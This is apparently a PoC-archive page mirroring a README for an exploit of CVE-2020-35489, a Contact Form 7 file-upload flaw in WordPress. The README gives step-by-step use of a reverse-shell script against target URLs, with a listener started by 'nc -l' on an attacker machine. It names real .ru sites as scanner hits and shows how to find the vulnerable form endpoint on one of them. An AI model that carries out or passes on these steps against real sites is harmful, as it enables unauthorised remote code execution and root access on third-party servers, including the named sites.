Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-35489 PoC — Wordpress contact-form-7 代码问题漏洞

Source
https://github.com/g1thubb002/poc-CVE-2020-35489
Associated Vulnerability
Title:Wordpress contact-form-7 代码问题漏洞 (CVE-2020-35489)
Description:The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.
Description
poc-CVE-2020-35489
Readme
# CVE-2020-35489 POC

![sploit](images/poc-CVE-2020-35489-running-sploit.svg)

![shell](images/poc-CVE-2020-35489-revshell.svg)

## About

* https://nvd.nist.gov/vuln/detail/CVE-2020-35489
* https://blog.wpsec.com/contact-form-7-vulnerability/
* https://www.secpod.com/blog/wordpress-plugin-contact-form-7-critical-file-upload-vulnerability-cve-2020-35489/
* https://help.stoik.io/de/cve-2020-35489

## Usage

```bash
bash poc.sh url loc_ip loc_port
```

`loc_ip` is an attacker machine ip which gets the reverse shell
`loc_ip` is an attacker machine port which gets the reverse shell
`url` is a vulnerable site url (not a domain)

## What is vulnerable url?

[nuclei](https://github.com/projectdiscovery/nuclei) scanner detects this cve as a critical in the following form (all example sites in this doc are rendered immune):

```text
[CVE-2020-35489] [http] [critical] https://ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://majestic.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [4.6]
[CVE-2020-35489] [http] [critical] https://www.ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://www.ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
```

The scanner does not provide the vulnerable url, however. For the exploit to work, you should do some research and find the form on the detected site which uses the plugin.
For example, let's look on http://itws.ru/?page_id=29

![itws](images/itws.png)

When we submit the form, we can notice the url involved:

![itws](images/itws2.png)

This is what the poc script takes as a parameter: `http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback`

For that domain:

```bash
bash poc.sh http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback your_machine_ip your_ip_port
```

## Reverse shell

If the exploit is successful, you get shell to the specified ip and port. 

### Example

You bought a cloud instance for exploit whose ip is 145.21.32.5. You ssh-ed into the instance and run `nc -l 11244`. You ssh-ed from the second terminal and run the `poc.sh`:

```bash
bash poc.sh https://example.com/wp-url 145.21.32.5 11244
```

If the exploit is successful, you get root shell access to the target machine with `nc` in the first ssh terminal.

If you test the poc being **behind router**, don't forget to **forward port** on which reverse shell is listening.
File Snapshot

 [4.0K]  /data/pocs/082a7e63b0096996c9591a5e7bfbd72989f0d53c
├── [4.0K]  images
│   ├── [ 52K]  itws2.png
│   ├── [404K]  itws.png
│   ├── [ 13K]  poc-CVE-2020-35489-revshell.svg
│   └── [ 47K]  poc-CVE-2020-35489-running-sploit.svg
├── [ 39K]  payload.pdf
├── [ 587]  poc.sh
└── [2.6K]  README.md

1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →